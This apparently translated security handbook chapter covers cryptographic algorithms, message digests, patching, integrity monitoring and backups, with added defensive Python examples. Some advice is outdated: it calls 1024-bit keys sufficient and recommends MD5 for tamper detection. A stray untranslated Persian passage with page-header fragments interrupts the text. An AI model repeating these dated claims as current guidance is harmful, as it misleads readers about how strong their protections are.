One symmetric key cryptosystem that has been proven to be unbreakable is the "one-time pad". In this kind of algorithm the communicating parties share a key consisting of a long string of random bytes (longer than the message that is to be sent). The message is encrypted and decrypted by transforming each byte of the message with one byte of the key, after which that key byte is destroyed and never used again. Because the key is random and does not repeat, even a key search attack is not feasible, because every possible message can be produced by some key.
Unfortunately, this class of algorithms has many limitations that make it impractical to use. In addition to the usual problems of symmetric encryption (exchanging and storing keys securely), generating large amounts of truly random data is not always easy, and distributing large amounts of key data can also be troublesome. Nevertheless, this system is used to some extent for communication links that require extremely high security.
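The one-time pad described above, as an added example that is not part of the handbook: it shows pad bytes being consumed exactly once, why a key search cannot single out the real message, and what leaks if a pad is ever reused. The class and function names are this example's own.

```python
import secrets


class PadBook:
    """Shared pad material that hands out each key byte exactly once."""

    def __init__(self, material: bytes):
        self._material = bytes(material)
        self._offset = 0

    def take(self, length: int) -> bytes:
        """Return the next unused pad bytes and mark them as spent."""
        if self._offset + length > len(self._material):
            raise ValueError("pad exhausted: refusing to reuse key bytes")
        chunk = self._material[self._offset:self._offset + length]
        self._offset += length
        return chunk

    def remaining(self) -> int:
        return len(self._material) - self._offset


def xor_bytes(left: bytes, right: bytes) -> bytes:
    """XOR two byte strings of equal length."""
    if len(left) != len(right):
        raise ValueError("inputs must have the same length")
    return bytes(a ^ b for a, b in zip(left, right))


def otp_encrypt(message: bytes, book: PadBook):
    """Encrypt with fresh pad bytes; returns (ciphertext, pad_used)."""
    pad = book.take(len(message))
    return xor_bytes(message, pad), pad


def otp_decrypt(ciphertext: bytes, pad: bytes) -> bytes:
    """XOR is its own inverse, so decryption repeats the same operation."""
    return xor_bytes(ciphertext, pad)


def pad_explaining(ciphertext: bytes, candidate: bytes) -> bytes:
    """Pad under which `ciphertext` would decrypt to `candidate`.

    Such a pad exists for every candidate of the right length, so trying
    all keys yields every possible message and identifies none of them.
    """
    return xor_bytes(ciphertext, candidate)


def reuse_leak(message_a: bytes, message_b: bytes, pad: bytes) -> bytes:
    """What an observer can compute when one pad encrypts two messages:
    the XOR of the two ciphertexts, in which the pad has cancelled out."""
    return xor_bytes(xor_bytes(message_a, pad), xor_bytes(message_b, pad))


if __name__ == "__main__":
    material = secrets.token_bytes(64)           # constructed sample pad
    sender, receiver = PadBook(material), PadBook(material)
    ciphertext, used = otp_encrypt(b"MEET AT DAWN", sender)
    print(otp_decrypt(ciphertext, receiver.take(len(ciphertext))))
    print(otp_decrypt(ciphertext, pad_explaining(ciphertext, b"STAY AT HOME")))
    print(reuse_leak(b"MEET AT DAWN", b"STAY AT HOME", used).hex())
```

The value returned by `reuse_leak` equals the XOR of the two plaintexts, which is why the key bytes must be destroyed after a single use.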
Public key algorithms
Developing public key algorithms is harder than developing symmetric key algorithms, and fewer of them are in use. Because the keys of symmetric and asymmetric encryption algorithms are used in fundamentally different ways, the relative strength and cryptographic power of these algorithms cannot be inferred by comparing key lengths. Key lengths in public key algorithms typically range from 512 to 2048 and 4096 bits, and for many users a length of 1024 bits will be sufficient for the foreseeable future. The following list summarizes the public key systems in common use today:
Diffie-Hellman
A system for exchanging cryptographic keys between communicating parties. Diffie-Hellman is not actually a method of encryption and decryption, but a method of developing and exchanging a shared private key over a public communication channel. In effect, the two parties agree on some common numerical values, and each party then creates a key. Mathematical transformations of the keys are exchanged, and each party can then compute a third, session key that cannot easily be derived by an attacker who knows both exchanged values.
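The exchange described above, as an added example that is not part of the handbook. It assumes a demonstration-sized group (the prime 2**127 - 1 with base 3), which is far too small for real use; deployments use standardized groups such as the 2048-bit MODP group of RFC 3526. The function names and the SHA-256 key derivation step are this example's own choices.

```python
import hashlib
import secrets

# Assumption of this example: a small demonstration group. P is prime, but
# a 127-bit modulus offers no real protection; it only keeps numbers readable.
P = 2**127 - 1
G = 3


def make_keypair(p=P, g=G):
    """Each party picks a private exponent and publishes g**private mod p."""
    private = secrets.randbelow(p - 3) + 2        # uniform in [2, p - 2]
    return private, pow(g, private, p)


def check_peer_value(value, p=P):
    """Reject degenerate public values before using them.

    0, 1 and p - 1 would force the shared secret into {0, 1, p - 1}, so an
    implementation must refuse them (and anything outside the group range).
    """
    if not isinstance(value, int) or not 2 <= value <= p - 2:
        raise ValueError("peer public value outside [2, p - 2]")
    return value


def session_key(own_private, peer_public, p=P):
    """Combine our private exponent with the peer's public value."""
    check_peer_value(peer_public, p)
    shared = pow(peer_public, own_private, p)
    raw = shared.to_bytes((p.bit_length() + 7) // 8, "big")
    # Hash the shared number into a fixed-length key for a symmetric cipher.
    return hashlib.sha256(raw).digest()


def run_exchange():
    """Both sides of the exchange; returns their keys and the wire traffic."""
    a_private, a_public = make_keypair()
    b_private, b_public = make_keypair()
    # Everything an eavesdropper sees: the agreed values and both
    # transformed keys, but neither private exponent.
    on_the_wire = {"p": P, "g": G, "A": a_public, "B": b_public}
    key_at_a = session_key(a_private, b_public)
    key_at_b = session_key(b_private, a_public)
    return key_at_a, key_at_b, on_the_wire


if __name__ == "__main__":
    key_a, key_b, wire = run_exchange()
    print("keys match:", key_a == key_b)
    print("visible to an observer:", sorted(wire))
```

Plain Diffie-Hellman does not authenticate either party, so in practice the exchanged values are signed or otherwise bound to an identity.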
DSA/DSS
The Digital Signature Standard (DSS) was developed by the U.S. National Security Agency (NSA) and was adopted by the National Institute of Standards and Technology as a Federal Information Processing Standard (FIPS). DSS is based on the Digital Signature Algorithm (DSA). Although DSA allows keys of any length, only keys of between 512 and 1024 bits are permitted under the DSS FIPS. As specified, DSS can be used only for digital signatures, although one kind of DSA implementation can also be used for encryption.
Elliptic curves
Elliptic curve cryptosystems are public key encryption systems that are based on elliptic curves instead of the traditional logarithmic functions. The advantage of elliptic curve systems stems from the fact that no computationally feasible algorithm is known for computing discrete logarithms on elliptic curves. For this reason, short keys in elliptic curve cryptosystems can provide a high degree of confidentiality and security, and their computations are also very fast. Elliptic curves can also be implemented efficiently in hardware.
RSA
RSA is a well-known public key cryptosystem that was developed in 1977 by three professors at MIT: Ronald Rivest, Adi Shamir, and Leonard Adleman. RSA can be used both to encrypt information and as the basis of a digital signature system. Digital signatures can be used to prove the authenticity or provenance of digital information. In this system the key can be of any length, depending on the particular implementation that is used.
Message digest functions
Message digest functions distill the information contained in a file (large or small) into a single large number, typically 128 to 256 bits long. The best message digest functions have the following properties:
a) Every bit of the digest function's output is potentially influenced by every bit of the function's input.
b) If any given bit of the function's input is changed, every output bit has a 50 percent chance of changing.
c) Given an input file and its corresponding message digest, it should be computationally infeasible to find another file with the same message digest value.
In theory, two different files can have the same message digest value. This is called a collision. For a message digest function to be secure, it must be computationally infeasible to find or produce such collisions.
Many message digest functions have been proposed and are now in use. A few of them are listed below:
MD2
Message Digest #2 was developed by Ronald Rivest. Among Rivest's message digest functions this one is the most secure, but it also takes the longest to compute. As a result, MD2 is rarely used. MD2 produces a 128-bit digest.
MD4
"Message Digest #4" was also developed by Ronald Rivest. This message digest algorithm was devised as a faster alternative to MD2. MD4 was subsequently shown to have potential weaknesses. That is, it may be possible to find a file that produces the same MD4 as a given file without resorting to a brute force search (which is infeasible for the same reason that searching a 128-bit key space is infeasible). MD4 also produces a 128-bit digest.
MD5
"Message Digest #5" was also developed by Ronald Rivest. MD5 is a modification of MD4 that includes techniques designed to make it more secure. Although MD5 is widely used, several flaws were discovered in it in the summer of 1996 that allowed certain kinds of collisions to be calculated in a weakened form of the algorithm. As a result, MD5 is slowly falling out of favor. Both MD5 and SHA-1 are used in SSL and in Microsoft's Authenticode technology. MD5 also produces a 128-bit digest.
SHA
The Secure Hash Algorithm is related to MD4 and was designed for use with the Digital Signature Standard of the National Institute of Standards and Technology (NIST's DSS). Shortly after the publication of SHA, NIST announced that it was not suitable for use without a small change. SHA produces a 160-bit digest.
SHA-1
The "revised Secure Hash Algorithm" is a slight modification of SHA. It is not publicly known whether these changes make SHA-1 more secure than SHA, although many people believe that they do. SHA-1 also produces a 160-bit digest.
SHA-256, SHA-384, SHA-512
The 256-, 384-, and 512-bit hash functions were designed for use with 128-, 192-, and 256-bit encryption algorithms, respectively. These functions were proposed by NIST in 2001 for use with the Advanced Encryption Standard.
In addition to these functions, it is also possible to use traditional symmetric block encryption systems such as DES as message digest functions. To use an encryption function as a message digest function, simply run the encryption function in cipher feedback mode. As the key, use a randomly chosen key that is dedicated to this application. Encrypt the entire input file. The last block of encrypted data is your message digest. Symmetric encryption algorithms produce excellent hashes, but they are much slower than the message digest functions described above.
Message digest functions are a powerful tool for detecting very small changes in very large files or messages. Calculate the MD5 code for your message and set it aside; later, if you think the file has been changed (deliberately or accidentally), simply calculate the MD5 code again and compare it with the MD5 you calculated the first time. If they match, you can assume with great confidence that the file has not been changed.
Because of their properties, message digest functions are also an important part of the cryptographic systems in use today. Message digests are the basis of most digital signature standards. Today's digital signature standards specify that, instead of signing the entire document, it is sufficient to sign a message digest of the document.
Message digests can also readily be used for message authentication codes (MACs), which use a secret shared between the two communicating parties to prove that a message is authentic. MACs are appended to the end of the message that is to be verified (RFC 2104 describes how to use keyed hashing for message authentication). MACs that are based on message digests provide additional cryptographic security for Internet routing protocols.
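The "compute a digest, set it aside, recompute and compare" check and the keyed MAC described above, combined in one added example that is not part of the handbook. It uses SHA-256 in place of MD5, since the text itself notes MD5's weaknesses, and seals the stored digests with HMAC-SHA-256 (the RFC 2104 construction) so that the baseline cannot be silently rewritten; the function names and the manifest layout are this example's own.

```python
import hashlib
import hmac
import json
import os


def file_digest(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large files fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file below `root` (by relative path) to its digest."""
    manifest = {}
    for directory, _subdirs, names in os.walk(root):
        for name in names:
            full = os.path.join(directory, name)
            manifest[os.path.relpath(full, root)] = file_digest(full)
    return manifest


def manifest_tag(manifest, key):
    """HMAC over a canonical (sorted-key) JSON encoding of the manifest."""
    body = json.dumps(manifest, sort_keys=True).encode("utf-8")
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def seal_manifest(manifest, key):
    """Attach the MAC so later readers can tell the baseline is genuine."""
    return {"files": dict(manifest), "hmac": manifest_tag(manifest, key)}


def open_manifest(sealed, key):
    """Return the baseline only if its MAC verifies under `key`."""
    expected = manifest_tag(sealed["files"], key)
    # compare_digest avoids leaking how many leading characters matched.
    if not hmac.compare_digest(expected, sealed["hmac"]):
        raise ValueError("baseline manifest failed HMAC verification")
    return sealed["files"]


def audit(root, sealed, key):
    """Recompute digests and report what differs from the sealed baseline."""
    baseline = open_manifest(sealed, key)
    current = build_manifest(root)
    return {
        "changed": sorted(p for p in baseline
                          if p in current and baseline[p] != current[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


if __name__ == "__main__":
    import tempfile

    key = b"constructed-demo-key"                 # constructed sample key
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "service.conf"), "wb") as handle:
            handle.write(b"PermitRootLogin no\n")
        sealed = seal_manifest(build_manifest(root), key)
        with open(os.path.join(root, "service.conf"), "wb") as handle:
            handle.write(b"PermitRootLogin yes\n")
        print(audit(root, sealed, key))
```

The baseline and its key belong on separate, read-only media; a digest stored beside the files it describes can be replaced along with them.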
Maintaining integrity
Maintaining the integrity and correctness of the information stored on computers is vital to overall security and to reliable operation. You must ensure the integrity of your operating system, the integrity of your application programs, and the integrity of your data. For operating systems and applications, this involves not only monitoring for unwanted changes to your software but also applying the patches and security fixes needed to keep the software secure.
Keeping systems up to date
From the moment a workstation or server is connected to the Internet, it is exposed to discovery and access attempts by unwanted outsiders. Attackers find new Internet hosts with astonishing speed. Reported details on this can be found on the web site maintained by the Honeynet Project, http://project.honeynet.org/. In one case, a newly configured Honeynet system was successfully penetrated only 15 minutes after it was placed on the network. Every system that is brought onto the network must therefore be kept up to date with security fixes, both before it is connected to the network and afterwards.
Software management systems
A software management system is a set of tools and procedures for keeping track of which versions of which software are installed, and of whether any local changes have been made to the software or to its configuration files. Without such a system, there is no way to know whether a piece of software needs to be updated, or which local changes have been made that must be preserved after the update. Using a software management system to keep a system up to date is vital for security purposes and is useful for non-security upgrades as well.
Fortunately, nearly all Unix systems and Windows NT-based systems provide some form of software management for the core components of the operating system and for the applications distributed with it. At present the most common approach is to use "managed packages" (precompiled executables and supporting files), which can themselves determine, by examining the system, which of the executables can be installed.
Package-based systems
A typical package file is a file that contains a set of precompiled executable programs, together with any related files such as libraries, default configuration files, and documentation. Under most packaging systems, the package also carries metadata such as the following:
• Information about the version of the software contained in the package;
• Information about compatible operating system versions or hardware architectures;
• A list of other packages that this package requires;
• A list of other packages with which this package conflicts;
• A list of which files are configuration files (or a list of the files that the user may modify after installation); and
• Commands that are to be run before, during, and after the installation of the files in the package.
The other important component of a package-based system is a database of the versions of the packages that are installed on the system. On Windows systems the Registry often serves this purpose.
Package-based systems are easy to use. With one or two simple commands, a system administrator can install new software, or upgrade existing software when a new or patched version is released. Because the executables in the package have already been compiled for the target operating system and hardware platform, the administrator does not need to spend time configuring the program.
On the other hand, packages are compiled to work with the typical configuration of the operating system, which is not necessarily the configuration you use. If you need to tune your programs to work with a particular kind of hardware, adapt them to an unusual authentication system, or simply want to run a program with a custom configuration, the source code, if it is available, will probably serve you better. The Unix kernel is a good example of this.
On commercial systems that do not provide source code, package-based management appears to be more appropriate than other approaches. For example, Solaris 2.x provides the commands pkgadd, pkgrm, pkginfo, showrev (and other similar commands) for adding, removing, or querying the status of packages from the shell, and the admintool command for managing software in a graphical environment. Windows systems use the WindowsUpdate web site to download and install update fixes for the operating system and its core utilities.
Package management is not limited to commercial systems. Free software Unix distributions also provide software management systems to make it easier for administrators to keep the system up to date. Several Linux distributions have adopted the RPM package management system. This system uses a single rpm command for all of its package management tasks. Debian GNU/Linux uses an alternative package management system called dpkg. BSD-based Unix systems focus on source-based updates, but they also provide a collection of precompiled packages that are managed with the pkg_add, pkg_delete, and pkg_info commands.
Source-based systems
In contrast to package-based systems, source-based systems typically emphasize helping the system administrator maintain an up-to-date copy of the source code of the operating system or application, from which new executables can be compiled and installed.
Source-based management has several advantages over package-based management: a source-based update is released in only a single version, in contrast to compiled packages, which must be compiled and packaged separately for each computer architecture or operating system on which the software runs. In addition, if local changes to the source code are required, only source-based systems can be used.
From a security standpoint, building packages from source code can be a mixed blessing. On the one hand, you are free to inspect the source code and make sure that it contains no hidden bugs or Trojan horses. In practice this inspection is difficult and is rarely carried out. On the other hand, if an attacker can gain access to your source code, it will not be very difficult for them to add the source of their own Trojan horse to it! To prevent this, you must make sure both that the source code you compile belongs to a trustworthy application and that the copy of the source code you hold is a trustworthy one.
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻭﺻﻠﻪﻫﺎ‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Free BSD‬ﻭ ﻧﺴﺨﻪﻫﺎﻱ ‪ Unix‬ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺭﺍ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ ‪port‬ﻫـﺎﻱ ﺧـﻮﺩ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﻭ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺻﻼﺡﻫﺎﻳﻲ ﻛﻪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺮﻧﺎﻣﻪ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻣﺤﻴﻂ ‪ BSD‬ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺗﺮﺟﻤﻪ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻣﻲﺳـﺎﺯﻧﺪ‪ ،‬ﺁﻧـﺮﺍ‬
‫ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ ‪ BSD‬ﻣﺮﺑﻮﻃﻪ )‪ (pkg_odd‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪FreeBSD‬‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﻴﺰﺍﻥ ﻭﺳﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪109 RPM Package Management‬‬
‫‪110 Source-Based Updates‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
The simplest way to manage source code is to keep the application's source code available on the system and recompile it whenever it changes. When a fix for an application is released, it usually takes the form of a patch diff: a file that describes which lines of the old version must be changed, deleted, or added to produce the new version. The diff program generates these files, and the patch program applies them to the old version so that the update produces the new version. After patching the source code, the system administrator recompiles the application and reinstalls it.
CVS
Another way to manage source code is to store it on a server under a source code version control system such as the Concurrent Versions System (CVS), and to configure the server to allow anonymous client connections. Users who want to bring their source code up to date with the latest release use the CVS program to check out the latest revision, after which the updated source can be compiled and installed.
FreeBSD, NetBSD, and OpenBSD use CVS to distribute and maintain the core software of their operating systems. In addition, tens of thousands of open source software projects maintain their own CVS servers or are hosted at sites such as sourceforge.net that provide CVS repositories. A good reference on CVS is the book Essential CVS, published by O'Reilly and Associates.
Upgrading system software
Before a system is connected to the network, it is essential to make sure that the patches for all known security problems in the software you run have been applied. Likewise, once the system is in operation, you must stay alert for newly discovered security problems in the operating system and applications so that you can apply the fixes as soon as they are released.
The safest way to patch newly installed software is to download the patches through another Internet-connected computer that is already up to date with the latest security fixes (for example, a Mac client or a personal computer that offers no server services). Once downloaded, the updates can be copied to a CD, or carried over a local network connection to the new system, and applied. This method is also appropriate when you have several computers running the same operating system to update, and downloading the updates repeatedly would slow down your network connection. The updates can be transferred only once and run from the CD on each machine. For Microsoft systems, the Windows Update Catalog web site makes downloadable updates available.
If no Internet-connected host is available or suitable for this purpose, the new host may have to be connected to the Internet before the patches have been applied. In that case, disable all network servers on the machine and keep the connection time as short as possible - just long enough to download the required patches - and then physically disconnect the machine from the network while the patches are being installed. This process can be made even safer if the machine's connection is protected by a stateful firewall or by a router that performs network address translation, so that the only packets that can reach the new host are those associated with a connection initiated by the new host itself.
You cannot keep software up to date if you do not know whether you have installed it. An important part of the update process is discovering and tracking new applications that have been installed. Operating systems that use software packages usually have commands that let you determine which packages are installed. Source-based management usually relies on keeping the source code of all installed applications in a single, easily accessible location.
Notes on patches
There are several other points to keep in mind about security problems and patches for operating systems and applications:
• Unix-based operating systems and most major applications, such as network servers, have mailing lists for announcing new releases. Microsoft offers e-mail delivery of its security bulletins through the Microsoft Profile Center (http://register.microsoft.com/regsys/pic.asp). Many vendors provide a separate mailing list for announcing security issues. Subscribe to these lists and pay attention to the messages.
• Various mailing lists such as BugTraq and NT-BugTraq collect and publish security alerts for many products. Subscribe to these lists (for example, in digest mode) and pay attention to the messages.
• Many developers of operating systems and applications post security announcements to the relevant Usenet newsgroups (for example, announcements about the BIND server appear in comp.protocols.dns.bind). Check these newsgroups regularly.
• If your vendor distributes CDs containing patches, use them. Although these CDs may not include the patches released up to the minute, they can save a great deal of Internet connection time when a new system is being set up, because they reduce the number of patches that must be downloaded.
• Automatic update systems compare the installed packages with the latest versions available on the vendor's web site and report which packages are out of date. Most of them can also be configured to download and install upgraded packages automatically. This capability can be useful if you trust the vendor to update your system. Some of them can be scheduled to run automatically, and others must be run by hand.
• Finally, you can manually check the vendor's web site from time to time for new versions of the software.
Downloading and verifying patches
Before you can use either package-based or source-based patches, you have to get the files from somewhere. Vendors usually make their applications available on the Internet through the World Wide Web or an anonymous FTP site. When an operating system or application becomes popular, a single web site or FTP site cannot keep up with the flood of download requests, so many software vendors designate other sites as mirror sites that offer the same service as their main site. Users are then encouraged to download the software from the nearest mirror site (in terms of network geography). All the software on the vendor's site is usually copied to the mirror sites at regular intervals (typically daily).
As soon as you learn of security patches, do not hesitate: apply them immediately. Publicly disclosed vulnerabilities are exploited almost at once. (Patches that add new features to the system in addition to fixing security vulnerabilities are not as urgent.)
Mirror sites are an important security benefit because they increase the availability of software through redundancy. They are also very useful when you have a fast connection to one of the mirror sites and a slow connection to the main site. On the other hand, mirror sites raise several security concerns:
• The administrators of mirror sites control their local copies of the software and may be able to corrupt them, replace them with a Trojaned version, and so on. In this situation you must trust not only the vendor but also the administrators of the mirror site. If the vendor publishes digital signatures along with its software (for example, PGP signatures with source code archives, gnupg signatures in rpm files, or signed ActiveX programs), you can be more confident that the software you receive is what the original vendor released, because you can obtain the vendor's public key directly from the vendor's own site rather than from the mirror site. Some automatic update systems check the signatures of patches before applying them.
• Even if you trust the mirror site, its daily update may not be fast enough for your purposes. If a very important security patch is released, you may not be able to wait 24 hours for your local mirror site to be updated. In such cases there is no alternative to downloading the patches directly from the original vendor's site.
Be very careful about applying patches that you find in mailing lists and public bulletin boards. At worst, such patches may have been crafted to trick people into installing a new vulnerability on their systems; at best, they have usually been produced by inexperienced programmers whose systems differ from yours, so their solution may do more harm than good to your system.
Upgrading applications
Under Unix-based package management systems, upgrading a package is usually a very simple process. For example, the following commands are needed to upgrade the bzip2-devel package on a system that uses RPM package management:
# ls -l *.rpm
-rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm
# rpm -K bzip2-devel-1.0.2-2.i386.rpm        (Check the checksum and signature)
bzip2-devel-1.0.2-2.i386.rpm: md5 OK
# rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm      (Upgrade the package)
Preparing... ########################################### [100%]
1:bzip2-devel ########################################### [100%]
# rpm -q bzip2-devel                          (Confirm that the version is now 1.0.2-2)
bzip2-devel-1.0.2-2
Installing a Solaris security patch is similarly easy. After patch 104489-15.tar.Z has been downloaded from the web site http://sunsolve.sun.com, the installpatch script is used to install the patch:
% ls *.tar.Z
104489-15.tar.Z
% uncompress *.Z
% tar xf 104489-15.tar
% cd 104489-15
% ls
.diPatch*         SUNWtltk/    backoutpatch*   postbackout*
Install.info*     SUNWtltkd/   installpatch*   postpatch*
README.104489-15  SUNWtltkm/   patchinfo*
% su
Password: password
# ./installpatch .
Checking installed patches...
Generating list of files to be patched...
Verifying sufficient filesystem capacity (exhaustive method)...
Installing patch packages...
Patch number 104489-15 has been successfully installed.
See /var/sadm/patch/104489-15/log for details
Executing postpatch script...
Patch packages installed:
SUNWtltk
SUNWtltkd
SUNWtltkm
# showrev -p | egrep 104489
Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd
Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
If you use source-based management, an upgrade requires either a CVS checkout of the changed source code or the application of a patch to the old source code to bring it up to date. In either case the source code must then be recompiled and installed. Here is an example of applying a patch to an application:
% ls -ld *
-rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09
drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/
% cd pennmush
% patch -p1 -s < ../1.7.5-patch09
% make
....source code compile messages...
% make install
...installation messages...
%
If you upgrade a server program, you must stop the server process and restart it so that the newly installed version is the one that runs - simply replacing the server program on the hard disk is not enough to replace the old version with the new one.
Upgrading applications on Windows systems is somewhat less uniform. If the application is one of Microsoft's core programs - such as Internet Explorer or Media Player - Windows Update takes care of it; but every other piece of software must provide its own upgrade method. Some may require you to uninstall the older version before you can install the new one; for some it may be enough to install the new version over the old one; and others may have an upgrade procedure of their own (antivirus programs are good examples of this). You will have to follow each program's own method.
Rolling back and backing up
Updating is not always the answer. Sometimes upgrades cause more problems than they solve, either because they break important functionality or because they do not actually fix the intended problem. It is important to be able to return the software to its pre-upgrade state if an applied upgrade turns out to be problematic.
There are two basic strategies for recovering from a bad upgrade. The first is to back out the patch and restore the previous version. Under source-based management systems, the patch program can also be used to remove a previously applied patch, or the previous version can be retrieved from a CVS repository. Backing out a package cleanly and without trouble can be very hard. Although most package management software provides a way to overwrite installed software with an older version, if the package's dependencies have also changed, older versions of those dependencies may have to be found and installed as well. Most (but not all) patches provided by Microsoft are able to uninstall themselves or come with instructions for uninstalling them.
The second strategy, for source-based management systems, is to keep backups of older versions of the software. With older versions of the source code on hand, reinstalling the previous version is generally not difficult. Several versions can be kept in separate directories under /usr/src, or a version control system such as RCS or CVS can be used locally to track multiple versions of the software in a single directory.
Perhaps the safest approach is to make a full backup of the system before making changes, so that the system can be restored to its previous state if the upgrade does not install correctly.
Integrity monitoring and installation
Making sure that system software is up to date when new patches are released is an important part of maintaining integrity. Equally important is making sure that system software - and your valuable data - does not change when you do not expect it to. Ideally, no unauthorized user or process should be able to tamper with your data. In practice, you need to monitor your data continuously so that you can detect tampering if it occurs, and archive your data in such a way that you can restore it to its previous state.
Tampering
There are several different ways to combat tampering. In addition to organizing user and file permissions carefully, important files that change infrequently can be kept on read-only media. Files can also be encrypted, so that changing the information in them requires getting past additional security measures. (Even so, it may still be possible to delete or corrupt these files.)
There are also many ways to detect tampering. On smaller systems, or when the number of key files that must be protected is limited, backing up the files to write-once media can be an effective strategy. The files are compared regularly with their archived counterparts; if a file is corrupted, the backup copy can be used to restore it, and when an authorized change is made to a file, the backup copy is brought into line with it.
Cryptographic digests of important files can be computed and stored offline, or protected with encryption. As mentioned earlier, an important property of cryptographic digests is that one cannot produce a new file whose digest matches a previously computed digest. Some antivirus systems can perform a similar function - often called inoculation - in which checksums are inserted into executable files. Chapter 5 provides a more detailed discussion of using comparison files and cryptographic digests to audit system data on an ongoing basis.
Backups
Bugs, accidents, natural disasters, and attacks on a system cannot be predicted, and despite your best efforts they usually cannot be prevented; but if you have backups, you can repair your system and bring it back to a stable state. Even if you lose your entire computer - to a fire, for example - with a complete set of backups you can restore your data after buying a replacement machine. The cost of a new microprocessor and disk drive may be covered by the insurance company, but your data is something that in many cases will be irreplaceable.
Years ago, making daily backups was common practice because computer hardware would often fail for no apparent reason, and a backup was the only protection against data loss. Today, hardware failure is still a good reason to back up systems. Hard disk failure is essentially random: even if a good hard disk lasts an average of 5 years or a little more, an organization with about 20 to 30 hard disks should expect a significant failure every few months. Disk drives usually fail without warning - sometimes only a few days after they have been put into service. The sensible course is therefore to back up the system at regular intervals.
Backups can also be an important tool for securing computers against attacks. In particular, a full backup lets you find what an attacker has changed by comparing the files on the computer with the files on the backup. Make the first backup of your system after installing the operating system, and after that install your applications and apply the necessary security patches. This first backup not only lets you analyze your system after an attack to find out what has changed, but can also reduce the time needed to rebuild the system after a hardware failure.
How to make backups
Several different forms of backup are in use today, some of which are listed below:
• Copying critical files to an optical disk or a high-capacity removable magnetic disk;
• Periodically copying a disk to a spare or mirror disk;
• Mirroring two disks simultaneously using hardware or software RAID systems;
• Making periodic zip, sit, or tar archives of important files, which you can keep on the primary system or at another location;
• Making backups on optical or magnetic tape; and
• Backing up files over the network or the Internet to another computer that you own, or to an Internet backup service.
Some of these services can be quite sophisticated. For example, they can check the MD5 checksums of your files and back up only the files that are unique. In that case, if you have thousands of computers that all have Microsoft Office installed, none of that program's files are added to the backup.
What to back up
There are two general approaches to computer backup systems:
1. Back up everything that is unique to your system - user accounts, data files, and important system directories that have been customized for your computer. This approach saves tape or disk and reduces the time needed to make a backup. If the system fails, you begin the recovery by reinstalling your computer's operating system and then all of your applications, and after that you restore your backup tapes.
2. Back up everything - because rebuilding a complete system is easier than repairing one piece of it, and tape is cheap.
The second approach should generally be preferred. Although some of the information you back up is already "backed up" on the original distribution disks or tapes that you used to load the system onto your hard disk, distribution tapes and disks sometimes get lost. Moreover, as your system ages, programs are installed in reserved operating system directories, for example as security holes are discovered and patched or as other changes occur. If you have ever tried to rebuild your system after a failure, you know how much simpler the process is when everything is in its place.
For this reason, it is recommended that you store everything on your system (that is, everything needed to reinstall the system, including every last file) on backup media at set intervals. The length of that interval depends on the speed of your backup equipment, the amount of storage devoted to backups, and your organization's needs. You might want to make a full backup once a week, or you might want to do it only twice a year.
Types of backups
There are three general types of backup: the level-zero (day-zero) backup, the full backup, and the incremental backup.
Level-zero (day-zero) backup
Makes a copy of your original system. When your system is first installed, before people start using it, back up every file and program on the system. If this backup is made after a successful break-in, it may be completely worthless.
Full backup
Copies every file on the computer to the backup. This is similar to a day-zero backup, except that it is done periodically.
Incremental backup
